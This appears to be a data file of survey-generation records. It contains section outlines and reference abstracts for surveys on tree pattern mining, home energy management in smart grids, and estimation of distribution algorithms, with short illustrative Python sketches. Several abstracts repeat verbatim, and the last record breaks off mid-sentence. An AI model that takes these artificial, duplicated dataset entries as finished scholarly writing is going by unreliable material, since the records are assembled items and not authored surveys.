Title: Frequent Tree Pattern Mining: A Survey Section 1: Introduction Description 1: Introduce the motivation behind using tree structures in data mining, outline the aim of the paper, and provide an overview of the organization of the paper. Section 2: Tree Representation Description 2: Explain the canonical tree representation and its importance. Discuss depth-first, breadth-first, and depth-sequence-based codification schemes. Section 3: Tree Patterns Description 3: Define different types of subtrees (bottom-up, induced, embedded, incorporated, subsumed) and describe how they are identified within tree databases. Section 4: Tree Pattern Mining Description 4: Analyze the algorithms proposed for tree pattern mining. Clarify the goals of frequent tree mining and explain the concepts of support and frequency. Section 5: Pattern Mining Strategies Description 5: Outline the two main mining strategies (Apriori-based and FP-Growth-based). Detail the candidate generation and support counting phases. Section 6: Candidate Generation Description 6: Describe various candidate generation techniques including rightmost expansion, equivalence class-based extension, right-and-left tree join, and extension and join methods. Section 7: Support Counting Description 7: Discuss the significance of efficient support counting and introduce different types of occurrence lists and other advanced data structures used for this purpose. Section 8: Tree Mining Algorithms Description 8: Survey specific tree mining algorithms, categorized by the types of trees they handle and the kinds of patterns they identify. Provide a brief overview of individual algorithms and their applications. Section 9: Conclusions Description 9: Summarize the main findings of the survey, discuss the common approaches and techniques used in tree mining algorithms, and highlight future directions in the research area.
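Section 5 of this outline contrasts Apriori-based and FP-Growth-based strategies. For reference, the generic Apriori-style level-wise loop that many of the cited tree miners instantiate can be sketched as follows; extend, count_support, and canonical are hypothetical placeholders for the algorithm-specific candidate generation, support counting, and canonical-form steps described in Sections 2, 6, and 7, not an implementation of any particular algorithm.

```python
# Generic Apriori-style level-wise mining loop, as instantiated (with very
# different candidate generation and counting machinery) by many of the
# surveyed tree miners. All helper functions are assumed placeholders.

def levelwise_mine(db, min_support, initial_patterns, extend, count_support, canonical):
    frequent = []
    level = [p for p in initial_patterns if count_support(p, db) >= min_support]
    while level:
        frequent.extend(level)
        # generate next-level candidates; the canonical form is used to
        # discard duplicate candidates produced by different extensions
        seen, candidates = set(), []
        for p in level:
            for c in extend(p, db):
                key = canonical(c)
                if key not in seen:
                    seen.add(key)
                    candidates.append(c)
        level = [c for c in candidates if count_support(c, db) >= min_support]
    return frequent
```

FP-Growth-style miners avoid the explicit candidate-generation step by growing patterns from projected (conditional) databases instead.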
A Survey of Home Energy Management Systems in Future Smart Grid Communications
13
--- paper_title: Home Energy Management Systems in Future Smart Grids paper_content: We present a detailed review of various Home Energy Management Schemes (HEMS). HEMS will increase savings, reduce peak demand and Peak to Average Ratio (PAR). Among various applications of smart grid technologies, home energy management is probably the most important one to be addressed. Various steps have been taken by utilities for efficient energy consumption. New pricing schemes like Time of Use (ToU), Real Time Pricing (RTP), Critical Peak Pricing (CPP), Inclining Block Rates (IBR) etc. have been devised for future smart grids. Home appliances and/or distributed energy resources coordination (Local Generation) along with different pricing schemes leads towards efficient energy consumption. This paper addresses various communication and optimization based residential energy management schemes and different communication and networking technologies involved in these schemes. INDEX TERMS—Smart grid, Home energy management, optimization. --- paper_title: Wireless Sensor Networks for Cost-Efficient Residential Energy Management in the Smart Grid paper_content: Wireless sensor networks (WSNs) will play a key role in the extension of the smart grid towards residential premises, and enable various demand and energy management applications. Efficient demand-supply balance and reducing electricity expenses and carbon emissions will be the immediate benefits of these applications. In this paper, we evaluate the performance of an in-home energy management (iHEM) application. The performance of iHEM is compared with an optimization-based residential energy management (OREM) scheme whose objective is to minimize the energy expenses of the consumers. We show that iHEM decreases energy expenses, reduces the contribution of the consumers to the peak load, reduces the carbon emissions of the household, and its savings are close to OREM. On the other hand, iHEM application is more flexible as it allows communication between the controller and the consumer utilizing the wireless sensor home area network (WSHAN). We evaluate the performance of iHEM under the presence of local energy generation capability, prioritized appliances, and for real-time pricing. We show that iHEM reduces the expenses of the consumers for each case. Furthermore, we show that packet delivery ratio, delay, and jitter of the WSHAN improve as the packet size of the monitoring applications, that also utilize the WSHAN, decreases. --- paper_title: Smart Home Energy Management System for Monitoring and Scheduling of Home Appliances Using Zigbee paper_content: Energy management system for efficient load management is presented in this paper. Proposed method consists of the two main parts. One is the energy management center (EMC) consisting of graphical user interface. EMC shows the runtime data and also maintains the data log for the user along with control of the appliances. Second part of the method is load scheduling which is performed using the single knapsack problem. Results of the EMC are shown using LABVIEW while MATLAB simulations are used to show the results of load scheduling. Hardware model is implemented using human machine interface (HMI). HMI consists of PIC18f4520 of microchip family and zigbee transceiver of MC12311 by Freescale. The microcontroller interface with the zigbee transceiver is on standard RS232 interface. INDEX TERMS—Smart Grid, Energy Management, Zigbee.
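The Zigbee-based smart home entry above performs load scheduling "using the single knapsack problem". As a hedged illustration of that idea (the paper's exact formulation, units, and data are not reproduced here), the following Python sketch selects, for one time slot, the subset of requested appliance runs that maximizes a user-assigned priority score without exceeding a power budget; all appliance names and numbers are invented.

```python
# Illustrative 0/1 knapsack view of appliance scheduling for one time slot:
# pick the subset of requested runs that maximizes total priority while the
# combined power draw stays within the slot's budget. Standard dynamic
# programming; the appliance data and formulation are assumptions, not
# taken from the cited paper.

def schedule_slot(appliances, power_budget):
    """appliances: list of (name, power_draw, priority); power in integer units."""
    # best[w] = (best total priority, chosen appliance names) using capacity w
    best = [(0, [])] * (power_budget + 1)
    for name, power, priority in appliances:
        for w in range(power_budget, power - 1, -1):
            cand_value = best[w - power][0] + priority
            if cand_value > best[w][0]:
                best[w] = (cand_value, best[w - power][1] + [name])
    return best[power_budget]

requests = [("washing machine", 5, 4), ("dishwasher", 4, 3),
            ("water heater", 6, 7), ("EV charger", 7, 6)]
print(schedule_slot(requests, power_budget=12))
# (11, ['washing machine', 'water heater']) within a 12-unit budget
```

In an actual HEM deployment the slot budget and the priorities might be driven by the pricing signals (ToU, RTP, CPP, IBR) and user preferences mentioned in the first entry of this list.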
--- paper_title: Cooperative sensor networks for voltage quality monitoring in smart grids paper_content: The paper intends to give a contribution toward the definition of a fully decentralized voltage quality monitoring architecture by proposing the employment of self organizing sensor networks. According to this paradigm each node can assess both the performances of the monitored site, computed by acquiring local information, and the global performances of the monitored grid section, computed by local exchanges of information with its neighbors nodes. Thanks to this feature each node could automatically detect local voltage quality anomalies. Moreover system operator can assess the system voltage quality index for each grid section by inquiring any node of the corresponding sensors network without the need of a central fusion center acquiring and processing all the node acquisitions. This makes the overall monitoring architecture highly scalable, self-organizing and distributed. --- paper_title: A Survey of Communications and Networking Technologies for Energy Management in Buildings and Home Automation paper_content: With the exploding power consumption in private households and increasing environmental and regulatory restraints, the need to improve the overall efficiency of electrical networks has never been greater. That being said, the most efficient way to minimize the power consumption is by voluntary mitigation of home electric energy consumption, based on energy-awareness and automatic or manual reduction of standby power of idling home appliances. Deploying bi-directional smart meters and home energy management (HEM) agents that provision real-time usage monitoring and remote control, will enable HEM in “smart households.” Furthermore, the traditionally inelastic demand curve has begun to change, and these emerging HEM technologies enable consumers (industrial to residential) to respond to the energy market behavior to reduce their consumption at peak prices, to supply reserves on an as-needed basis, and to reduce demand on the electric grid. Because the development of smart grid-related activities has resulted in an increased interest in demand response (DR) and demand side management (DSM) programs, this paper presents some popular DR and DSM initiatives that include planning, implementation and evaluation techniques for reducing energy consumption and peak electricity demand. The paper then focuses on reviewing and distinguishing the various state-of-the-art HEM control and networking technologies, and outlines directions for promoting the shift towards a society with low energy demand and low greenhouse gas emissions. The paper also surveys the existing software and hardware tools, platforms, and test beds for evaluating the performance of the information and communications technologies that are at the core of future smart grids. It is envisioned that this paper will inspire future research and design efforts in developing standardized and user-friendly smart energy monitoring systems that are suitable for wide scale deployment in homes. --- paper_title: Minimizing Electricity Theft Using Smart Meters in AMI paper_content: Global energy crises are increasing every moment. Every one has the attention towards more and more energy production and also trying to save it. Electricity can be produced through many ways which is then synchronized on a main grid for usage. The main issue for which we have written this survey paper is losses in the electrical system.
These losses can be technical or non-technical. Technical losses can be calculated easily, as we discuss in the mathematical modeling section, whereas non-technical losses can be evaluated if technical losses are known. Theft in electricity produces non-technical losses. To reduce or control theft one can save his economic resources. Smart meter can be the best option to minimize electricity theft, because of its high security, best efficiency, and excellent resistance towards many of theft ideas in electromechanical meters. So in this paper we have mostly concentrated on theft issues. --- paper_title: Monitoring and Controlling Power using Zigbee Communications paper_content: Smart grid is a modified form of electrical grid where generation, transmission, distribution and customers are not only connected electrically but also through strong communication network with each other as well as with market, operation and service provider. For achieving good communication link among them, it is very necessary to find suitable protocol. In this paper, we discuss different hardware techniques for power monitoring, power management and remote power controlling at home and transmission side and also discuss the suitability of Zigbee for required communication link. Zigbee has major role in monitoring and direct load controlling for efficient power utilization. It covers enough area needed for communication and it works on low data rate of 20Kbps to 250Kbps with minimum power consumption. This paper describes user-friendly control of home appliances, power on/off through the internet, PDA using Graphical User Interface (GUI) and through GSM cellular mobile phone. --- paper_title: Wireless Sensor Networks for Cost-Efficient Residential Energy Management in the Smart Grid paper_content: Wireless sensor networks (WSNs) will play a key role in the extension of the smart grid towards residential premises, and enable various demand and energy management applications. Efficient demand-supply balance and reducing electricity expenses and carbon emissions will be the immediate benefits of these applications. In this paper, we evaluate the performance of an in-home energy management (iHEM) application. The performance of iHEM is compared with an optimization-based residential energy management (OREM) scheme whose objective is to minimize the energy expenses of the consumers. We show that iHEM decreases energy expenses, reduces the contribution of the consumers to the peak load, reduces the carbon emissions of the household, and its savings are close to OREM. On the other hand, iHEM application is more flexible as it allows communication between the controller and the consumer utilizing the wireless sensor home area network (WSHAN). We evaluate the performance of iHEM under the presence of local energy generation capability, prioritized appliances, and for real-time pricing. We show that iHEM reduces the expenses of the consumers for each case. Furthermore, we show that packet delivery ratio, delay, and jitter of the WSHAN improve as the packet size of the monitoring applications, that also utilize the WSHAN, decreases. --- paper_title: A System Architecture for Autonomous Demand Side Load Management in Smart Buildings paper_content: This paper presents a system architecture for load management in smart buildings which enables autonomous demand side load management in the smart grid.
Being of a layered structure composed of three main modules for admission control, load balancing, and demand response management, this architecture can encapsulate the system functionality, assure the interoperability between various components, allow the integration of different energy sources, and ease maintenance and upgrading. Hence it is capable of handling autonomous energy consumption management for systems with heterogeneous dynamics in multiple time-scales and allows seamless integration of diverse techniques for online operation control, optimal scheduling, and dynamic pricing. The design of a home energy manager based on this architecture is illustrated and the simulation results with Matlab/Simulink confirm the viability and efficiency of the proposed framework. --- paper_title: A Survey of Communications and Networking Technologies for Energy Management in Buildings and Home Automation paper_content: With the exploding power consumption in private households and increasing environmental and regulatory restraints, the need to improve the overall efficiency of electrical networks has never been greater. That being said, the most efficient way to minimize the power consumption is by voluntary mitigation of home electric energy consumption, based on energy-awareness and automatic or manual reduction of standby power of idling home appliances. Deploying bi-directional smart meters and home energy management (HEM) agents that provision real-time usage monitoring and remote control will enable HEM in “smart households.” Furthermore, the traditionally inelastic demand curve has begun to change, and these emerging HEM technologies enable consumers (industrial to residential) to respond to the energy market behavior to reduce their consumption at peak prices, to supply reserves on an as-needed basis, and to reduce demand on the electric grid. Because the development of smart grid-related activities has resulted in an increased interest in demand response (DR) and demand side management (DSM) programs, this paper presents some popular DR and DSM initiatives that include planning, implementation and evaluation techniques for reducing energy consumption and peak electricity demand. The paper then focuses on reviewing and distinguishing the various state-of-the-art HEM control and networking technologies, and outlines directions for promoting the shift towards a society with low energy demand and low greenhouse gas emissions. The paper also surveys the existing software and hardware tools, platforms, and test beds for evaluating the performance of the information and communications technologies that are at the core of future smart grids. It is envisioned that this paper will inspire future research and design efforts in developing standardized and user-friendly smart energy monitoring systems that are suitable for wide scale deployment in homes. --- paper_title: Density Controlled Divide-and-Rule Scheme for Energy Efficient Routing in Wireless Sensor Networks paper_content: Cluster-based routing is the most popular routing technique in Wireless Sensor Networks (WSNs). Due to the varying needs of WSN applications, efficient energy utilization in routing protocols is still a potential area of research. In this research work we introduce a new energy-efficient cluster-based routing technique with which we try to overcome the problems of coverage holes and energy holes.
In our technique, we control these problems by introducing a density-controlled uniform distribution of nodes and by fixing the optimum number of Cluster Heads (CHs) in each round. Finally, we verify our technique through MATLAB simulation results. --- paper_title: CEEC: Centralized Energy Efficient Clustering A New Routing Protocol for WSNs paper_content: Designing energy-efficient routing protocols for Wireless Sensor Networks (WSNs) is one of the most challenging tasks for researchers. Hierarchical routing protocols have proved to be more energy efficient than flat and location-based routing protocols. Heterogeneity of nodes with respect to their energy levels also adds extra lifespan to the sensor network. In this paper, we propose a Centralized Energy Efficient Clustering (CEEC) routing protocol. We design CEEC for a three-level heterogeneous network, although it can also be implemented for networks with multi-level heterogeneity. As an initial demonstration, we design and analyze CEEC for a three-level advanced heterogeneous network. In CEEC, the whole network area is divided into three equal regions, and nodes with the same energy level are deployed in the same region. --- paper_title: Wireless Sensor Networks for Cost-Efficient Residential Energy Management in the Smart Grid paper_content: Wireless sensor networks (WSNs) will play a key role in the extension of the smart grid towards residential premises, and enable various demand and energy management applications. Efficient demand-supply balance and reducing electricity expenses and carbon emissions will be the immediate benefits of these applications. In this paper, we evaluate the performance of an in-home energy management (iHEM) application. The performance of iHEM is compared with an optimization-based residential energy management (OREM) scheme whose objective is to minimize the energy expenses of the consumers. We show that iHEM decreases energy expenses, reduces the contribution of the consumers to the peak load, reduces the carbon emissions of the household, and its savings are close to OREM. On the other hand, iHEM application is more flexible as it allows communication between the controller and the consumer utilizing the wireless sensor home area network (WSHAN). We evaluate the performance of iHEM under the presence of local energy generation capability, prioritized appliances, and for real-time pricing. We show that iHEM reduces the expenses of the consumers for each case. Furthermore, we show that packet delivery ratio, delay, and jitter of the WSHAN improve as the packet size of the monitoring applications, that also utilize the WSHAN, decreases. --- paper_title: Wireless Sensor Networks for Cost-Efficient Residential Energy Management in the Smart Grid paper_content: Wireless sensor networks (WSNs) will play a key role in the extension of the smart grid towards residential premises, and enable various demand and energy management applications. Efficient demand-supply balance and reducing electricity expenses and carbon emissions will be the immediate benefits of these applications. In this paper, we evaluate the performance of an in-home energy management (iHEM) application. The performance of iHEM is compared with an optimization-based residential energy management (OREM) scheme whose objective is to minimize the energy expenses of the consumers.
We show that iHEM decreases energy expenses, reduces the contribution of the consumers to the peak load, reduces the carbon emissions of the household, and its savings are close to OREM. On the other hand, iHEM application is more flexible as it allows communication between the controller and the consumer utilizing the wireless sensor home area network (WSHAN). We evaluate the performance of iHEM under the presence of local energy generation capability, prioritized appliances, and for real-time pricing. We show that iHEM reduces the expenses of the consumers for each case. Furthermore, we show that packet delivery ratio, delay, and jitter of the WSHAN improve as the packet size of the monitoring applications, that also utilize the WSHAN, decreases. --- paper_title: Wireless Sensor Networks for domestic energy management in smart grids paper_content: Wireless Sensor Networks (WSN) are getting more integrated to our daily lives and smart surroundings as they are being used for health, comfort and safety applications. In smart homes and office environments, WSNs are generally used to increase the inhabitant comfort. As the current energy grid is evolving into a smart grid, where consumers can directly reach and control their consumption, WSNs can take part in domestic energy management systems, as well. In this paper, we propose the Appliance Coordination (ACORD) scheme, that uses the in-home WSN and reduces the cost of energy consumption. The cost of energy increases at peak hours, hence reducing the peak demand is a major concern for utility companies. The ACORD scheme, aims to shift consumer demands to off-peak hours. Appliances use the readily available in-home WSN to deliver consumer requests to the Energy Management Unit (EMU). EMU schedules consumer requests with the goal of reducing the energy bill. We show that ACORD decreases the cost of electricity usage of home appliances significantly. --- paper_title: Optimal Residential Load Control With Price Prediction in Real-Time Electricity Pricing Environments paper_content: Real-time electricity pricing models can potentially lead to economic and environmental advantages compared to the current common flat rates. In particular, they can provide end users with the opportunity to reduce their electricity expenditures by responding to pricing that varies with different times of the day. However, recent studies have revealed that the lack of knowledge among users about how to respond to time-varying prices as well as the lack of effective building automation systems are two major barriers for fully utilizing the potential benefits of real-time pricing tariffs. We tackle these problems by proposing an optimal and automatic residential energy consumption scheduling framework which attempts to achieve a desired trade-off between minimizing the electricity payment and minimizing the waiting time for the operation of each appliance in household in presence of a real-time pricing tariff combined with inclining block rates. Our design requires minimum effort from the users and is based on simple linear programming computations. Moreover, we argue that any residential load control strategy in real-time electricity pricing environments requires price prediction capabilities. This is particularly true if the utility companies provide price information only one or two hours ahead of time. 
By applying a simple and efficient weighted average price prediction filter to the actual hourly-based price values used by the Illinois Power Company from January 2007 to December 2009, we obtain the optimal choices of the coefficients for each day of the week to be used by the price predictor filter. Simulation results show that the combination of the proposed energy consumption scheduling design and the price predictor filter leads to significant reduction not only in users' payments but also in the resulting peak-to-average ratio in load demand for various load scenarios. Therefore, the deployment of the proposed optimal energy consumption scheduling schemes is beneficial for both end users and utility companies. --- paper_title: Using wireless sensor networks for energy-aware homes in smart grids paper_content: Smart grids aim to integrate recent advances in communications and information technologies to renovate the existing power grid. In smart grids, consumers can generate energy and sell it to the utilities. Moreover, they can avoid consumption during peak hours, which helps reduce the peak load on the grid. Energy-aware homes can help consumers manage their demand and supply profiles. In this paper, we propose the Appliance Coordination with Feed-In (ACORD-FI) scheme for such energy-aware smart homes. We show that ACORD-FI significantly decreases the cost of energy consumption of home appliances. --- paper_title: Optimum residential load management strategy for real time pricing (RTP) demand response programs paper_content: This paper presents an optimal load management strategy for residential consumers that utilizes the communication infrastructure of the future smart grid. The strategy considers predictions of electricity prices, energy demand, renewable power production, and power-purchase of energy of the consumer in determining the optimal relationship between hourly electricity prices and the use of different household appliances and electric vehicles in a typical smart house. The proposed strategy is illustrated using two study cases corresponding to a house located in Zaragoza (Spain) for a typical day in summer. Results show that the proposed model allows users to control their daily energy consumption and adapt their electricity bills to their actual economic situation. --- paper_title: Coordinated Scheduling of Residential Distributed Energy Resources to Optimize Smart Home Energy Services paper_content: We describe algorithmic enhancements to a decision-support tool that residential consumers can utilize to optimize their acquisition of electrical energy services. The decision-support tool optimizes energy services provision by enabling end users to first assign values to desired energy services, and then scheduling their available distributed energy resources (DER) to maximize net benefits. We chose particle swarm optimization (PSO) to solve the corresponding optimization problem because of its straightforward implementation and demonstrated ability to generate near-optimal schedules within manageable computation times. We improve the basic formulation of cooperative PSO by introducing stochastic repulsion among the particles. The improved DER schedules are then used to investigate the potential consumer value added by coordinated DER scheduling. This is computed by comparing the end-user costs obtained with the enhanced algorithm simultaneously scheduling all DER, against the costs when each DER schedule is solved separately.
This comparison enables the end users to determine whether their mix of energy service needs, available DER and electricity tariff arrangements might warrant solving the more complex coordinated scheduling problem, or instead, decomposing the problem into multiple simpler optimizations. --- paper_title: A Survey of Communications and Networking Technologies for Energy Management in Buildings and Home Automation paper_content: With the exploding power consumption in private households and increasing environmental and regulatory restraints, the need to improve the overall efficiency of electrical networks has never been greater. That being said, the most efficient way to minimize the power consumption is by voluntary mitigation of home electric energy consumption, based on energy-awareness and automatic or manual reduction of standby power of idling home appliances. Deploying bi-directional smart meters and home energy management (HEM) agents that provision real-time usage monitoring and remote control will enable HEM in “smart households.” Furthermore, the traditionally inelastic demand curve has begun to change, and these emerging HEM technologies enable consumers (industrial to residential) to respond to the energy market behavior to reduce their consumption at peak prices, to supply reserves on an as-needed basis, and to reduce demand on the electric grid.
Because the development of smart grid-related activities has resulted in an increased interest in demand response (DR) and demand side management (DSM) programs, this paper presents some popular DR and DSM initiatives that include planning, implementation and evaluation techniques for reducing energy consumption and peak electricity demand. The paper then focuses on reviewing and distinguishing the various state-of-the-art HEM control and networking technologies, and outlines directions for promoting the shift towards a society with low energy demand and low greenhouse gas emissions. The paper also surveys the existing software and hardware tools, platforms, and test beds for evaluating the performance of the information and communications technologies that are at the core of future smart grids. It is envisioned that this paper will inspire future research and design efforts in developing standardized and user-friendly smart energy monitoring systems that are suitable for wide scale deployment in homes. ---
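The price-prediction idea in the "Optimal Residential Load Control With Price Prediction" reference above lends itself to a short illustration. The following minimal Python sketch shows a weighted-average hourly price predictor of that general kind; the weights, the three-day history, and the function name are hypothetical placeholders, not the coefficients fitted to the Illinois Power Company data in the paper.

# Minimal sketch of a weighted-average price predictor. The coefficient values
# below are hypothetical placeholders chosen only for illustration.
def predict_hourly_prices(prices_prev_days, weights=(0.5, 0.3, 0.2)):
    """Predict the next day's 24 hourly prices as a weighted average of the
    same hours on the previous days (most recent day first)."""
    assert len(prices_prev_days) == len(weights)
    predicted = []
    for hour in range(24):
        estimate = sum(w * day[hour] for w, day in zip(weights, prices_prev_days))
        predicted.append(estimate)
    return predicted

# Example: three previous days of (flat, for brevity) hourly prices in cents/kWh.
history = [[4.2] * 24, [3.9] * 24, [4.5] * 24]
print(predict_hourly_prices(history)[0])  # weighted estimate for hour 0

In a scheduler of the kind described above, such predicted prices would stand in for the unknown future tariff when deciding when to run each appliance.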
Title: A Survey of Home Energy Management Systems in Future Smart Grid Communications
Section 1: Introduction
Description 1: Introduces the traditional power grid, the integration of advanced Information and Communication Technologies (ICT) in smart grids, and the advantages brought about by this integration for efficiency and consumer comfort.
Section 2: Home Energy Management and Monetary Cost Minimization
Description 2: Discusses the concept of energy management, the importance of HEM systems in reducing energy bills, different pricing schemes, and the environmental benefits of effective energy management.
Section 3: Optimization-Based Residential Energy Management (OREM)
Description 3: Describes an optimization-based residential energy management model aiming to minimize household electricity costs by scheduling home appliances.
Section 4: In-Home Energy Management (iHEM)
Description 4: Presents a real-time energy management scheme using smart appliances and communication protocols to coordinate energy usage within homes.
Section 5: Appliance Coordination (ACORD)
Description 5: Details an energy management scheme designed to shift consumer load to off-peak periods to benefit from Time of Use (ToU) pricing and reduce energy costs.
Section 6: Optimal and Automatic Residential Energy Consumption Scheduler
Description 6: Introduces an optimization scheme utilizing price predictions and energy scheduling to reduce peak-to-average ratio (PAR) in load demand.
Section 7: Appliance Coordination with Feed-In (ACORD-FI)
Description 7: Explains an energy management scheme that includes coordination of distributed energy resources (DER) and home appliances to reduce energy bills and greenhouse gas emissions.
Section 8: Optimum Load Management (OLM) Strategy
Description 8: Outlines an optimization strategy for residential load management, incorporating user interests and activity scheduling to minimize energy costs.
Section 9: Decision Support Tool (DsT)
Description 9: Describes a tool designed to help users make intelligent decisions about appliance operation and DER coordination to maximize consumer benefits and reduce energy bills.
Section 10: Sensors and Control System
Description 10: Discusses the role of sensors and control systems in future smart homes for local power generation, energy management, and diagnostics at a micro-level.
Section 11: Monitoring and Control Devices
Description 11: Explores the challenges and functionalities of monitoring and control devices that provide users with real-time consumption data and control interfaces for HEM systems.
Section 12: Intelligent Power Management Rostrum (IPMR)
Description 12: Details IPMR as the core of HEM systems, integrating data from sensors, external sources, and local environments to facilitate home automation and power management.
Section 13: Challenges for Smart Grid
Description 13: Identifies major challenges such as scalability, interdisciplinarity, and security and privacy issues that need to be addressed for the smart grid to function effectively.
Section 14: Conclusion
Description 14: Summarizes the overall benefits of HEM systems in smart grids, various HEM schemes discussed in the paper, and future prospects for developing more efficient and user-friendly HEM systems.
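Several of the schemes outlined above (ACORD, iHEM, OREM) shift flexible appliance requests toward cheaper hours. The sketch below illustrates that idea in its simplest greedy form under a Time of Use tariff; the tariff values, appliance names, and request windows are made up for illustration and do not reproduce any particular scheme from the survey.

# Greedy ToU scheduler sketch: each shiftable request is placed in the cheapest
# hour of its allowed window. All numbers here are hypothetical.
def schedule_requests(requests, tariff):
    """Assign each shiftable appliance request to the cheapest hour within its
    allowed window; returns {appliance: (hour, cost)}."""
    schedule = {}
    for name, (energy_kwh, earliest, latest) in requests.items():
        hours = range(earliest, latest + 1)
        best_hour = min(hours, key=lambda h: tariff[h % 24])
        schedule[name] = (best_hour, energy_kwh * tariff[best_hour % 24])
    return schedule

# Hypothetical two-rate ToU tariff ($/kWh): peak 07:00-22:59, off-peak otherwise.
tariff = [0.08 if (h < 7 or h >= 23) else 0.20 for h in range(24)]
# Request windows may run past midnight (hour 30 means 06:00 the next day).
requests = {"washer": (1.2, 18, 30), "dishwasher": (1.0, 20, 28)}
print(schedule_requests(requests, tariff))

A full HEM scheduler would additionally respect appliance priorities, consumer waiting-time preferences, and locally generated energy, as the schemes above describe.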
An introduction and survey of estimation of distribution algorithms
16
--- paper_title: Real-coded ECGA for economic dispatch paper_content: In this paper, we propose a new approach that consists of the extended compact genetic algorithm (ECGA) and split-on-demand (SoD), an adaptive discretization technique, to economic dispatch (ED) problems with nonsmooth cost functions. ECGA is designed for handling problems with decision variables of the discrete type, while the decision variables of ED problems are oftentimes real numbers. Thus, in order to employ ECGA to tackle ED problems, SoD is utilized for discretizing the continuous decision variables and works as the interface between ECGA and the ED problem. Furthermore, ED problems in practice are usually hard for traditional mathematical programming methodologies because of the equality and inequality constraints. Hence, in addition to integrating ECGA and SoD, in this study, we devise a repair operator specifically for making the infeasible solutions satisfy the equality constraint. To examine the performance and effectiveness, we apply the proposed framework to two different-sized ED problems with nonsmooth cost function considering the valve-point effects. The experimental results are compared to those obtained by various evolutionary algorithms and demonstrate that handling ED problems with the proposed framework is a promising research direction. --- paper_title: A new epsilon-dominance hierarchical Bayesian optimization algorithm for large multiobjective monitoring network design problems paper_content: This study focuses on the development of a next generation multiobjective evolutionary algorithm (MOEA) that can learn and exploit complex interdependencies and/or correlations between decision variables in monitoring design applications to provide more robust performance for large problems (defined in terms of both the number of objectives and decision variables). The proposed MOEA is termed the epsilon-dominance hierarchical Bayesian optimization algorithm (ε-hBOA), which is representative of a new class of probabilistic model building evolutionary algorithms. The ε-hBOA has been tested relative to a top-performing traditional MOEA, the epsilon-dominance nondominated sorted genetic algorithm II (ε-NSGAII), for solving a four-objective LTM design problem. A comprehensive performance assessment of the ε-NSGAII and various configurations of the ε-hBOA has been performed for both a 25-well LTM design test case (representing a relatively small problem with over 33 million possible designs), and a 58-point LTM design test case (with over 2.88 × 10^17 possible designs). The results from this comparison indicate that the model building capability of the ε-hBOA greatly enhances its performance relative to the ε-NSGAII, especially for large monitoring design problems. This work also indicates that decision variable interdependencies appear to have a significant impact on the overall mathematical difficulty of the monitoring network design problem. --- paper_title: Population Based Incremental Learning: A Method for Integrating Genetic Search Based Function Optimization and Competitive Learning paper_content: Genetic algorithms (GAs) are biologically motivated adaptive systems which have been used, with varying degrees of success, for function optimization. In this study, an abstraction of the basic genetic algorithm, the Equilibrium Genetic Algorithm (EGA), and the GA in turn, are reconsidered within the framework of competitive learning.
This new perspective reveals a number of different possibilities for performance improvements. This paper explores population-based incremental learning (PBIL), a method of combining the mechanisms of a generational genetic algorithm with simple competitive learning. The combination of these two methods reveals a tool which is far simpler than a GA, and which outperforms a GA on a large set of optimization problems in terms of both speed and accuracy. This paper presents an empirical analysis of where the proposed technique will outperform genetic algorithms, and describes a class of problems in which a genetic algorithm may be able to perform better. Extensions to this algorithm are discussed and analyzed. PBIL and extensions are compared with a standard GA on twelve problems, including standard numerical optimization functions, traditional GA test suite problems, and NP-Complete problems. --- paper_title: Evaluation of Advanced Genetic Algorithms Applied to Groundwater Remediation Design paper_content: Optimal design of a groundwater pump and treat system is a difficult task, especially given the computationally intensive nature of field-scale remediation design. Genetic algorithms (GAs) have been used extensively for remediation design because of their flexibility and global search capabilities, but computational intensity is a particularly difficult issue with GAs. This paper discusses a new competent GA, the hierarchical Bayesian Optimization Algorithm (hBOA), which is designed to reduce the computational effort. GAs operate by assembling highly fit segments of chromosomes (potential solutions), called building blocks. The hBOA enhances the efficiency of this process by using a Bayesian network to create models of the building blocks. The building blocks are nodes on the network, and the algorithm uses the network to generate new solutions, retaining the best building blocks of the parents. This work compares the performance of hBOA to a simple genetic algorithm (SGA) in solving a case study to determine if any benefit can be gained through the use of this approach. This work demonstrates that hBOA more reliably identifies the optimal solution to this groundwater remediation design problem. --- paper_title: Searching for Ground States of Ising Spin Glasses with Hierarchical BOA and Cluster Exact Approximation paper_content: This chapter applies the hierarchical Bayesian optimization algorithm (hBOA) to the problem of finding ground states of Ising spin glasses with ±J and Gaussian couplings in two and three dimensions. The performance of hBOA is compared to that of the simple genetic algorithm (GA) and the univariate marginal distribution algorithm (UMDA). The performance of all tested algorithms is improved by incorporating a deterministic hill climber based on single-bit flips. The results show that hBOA significantly outperforms GA and UMDA on a broad spectrum of spin glass instances. Cluster exact approximation (CEA) is then described and incorporated into hBOA and GA to improve their efficiency. The results show that CEA enables all tested algorithms to solve larger spin glass instances and that hBOA significantly outperforms other compared algorithms even in this case.
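The PBIL reference above is compact enough to illustrate directly. The following Python sketch shows the core probability-vector update on the OneMax toy problem; the learning rate, population size, and the use of only the single best sample per generation are illustrative choices, not the exact settings studied in the paper.

import random

def pbil_onemax(n_bits=20, pop_size=50, lr=0.1, generations=100, seed=0):
    """Minimal PBIL sketch on OneMax: sample a population from a probability
    vector, then shift the vector toward the best sample."""
    rng = random.Random(seed)
    prob = [0.5] * n_bits
    for _ in range(generations):
        samples = [[1 if rng.random() < p else 0 for p in prob] for _ in range(pop_size)]
        best = max(samples, key=sum)  # OneMax fitness = number of ones
        prob = [(1 - lr) * p + lr * b for p, b in zip(prob, best)]
    return prob

print([round(p, 2) for p in pbil_onemax()])  # probabilities drift toward 1.0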
--- paper_title: A survey of optimization by building and using probabilistic models paper_content: Summarizes the research on population-based probabilistic search algorithms based on modeling promising solutions by estimating their probability distribution and using the constructed model to guide the exploration of the search space. It settles the algorithms in the field of genetic and evolutionary computation where they originated. All methods are classified into a few classes according to the complexity of the class of models they use. Algorithms from each of these classes are briefly described and their strengths and weaknesses are discussed. --- paper_title: Optimising cancer chemotherapy using an estimation of distribution algorithm and genetic algorithms paper_content: This paper presents a methodology for using heuristic search methods to optimise cancer chemotherapy. Specifically, two evolutionary algorithms - Population Based Incremental Learning (PBIL), which is an Estimation of Distribution Algorithm (EDA), and Genetic Algorithms (GAs) - have been applied to the problem of finding effective chemotherapeutic treatments. To our knowledge, EDAs have been applied to fewer real world problems compared to GAs, and the aim of the present paper is to expand the application domain of this technique. We compare and analyse the performance of both algorithms and draw a conclusion as to which approach to cancer chemotherapy optimisation is more efficient and helpful in the decision-making activity led by the oncologists. --- paper_title: Automated alphabet reduction method with evolutionary algorithms for protein structure prediction paper_content: This paper focuses on automated procedures to reduce the dimensionality of protein structure prediction datasets by simplifying the way in which the primary sequence of a protein is represented. The potential benefits of this procedure are a faster and easier learning process as well as the generation 